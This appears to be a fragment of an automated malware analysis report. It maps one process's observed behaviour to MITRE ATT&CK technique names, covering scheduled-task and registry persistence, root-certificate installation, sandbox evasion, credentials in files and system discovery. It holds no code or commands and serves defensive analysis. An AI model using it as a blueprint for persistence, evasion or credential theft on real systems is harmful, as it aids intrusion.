PID:4576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery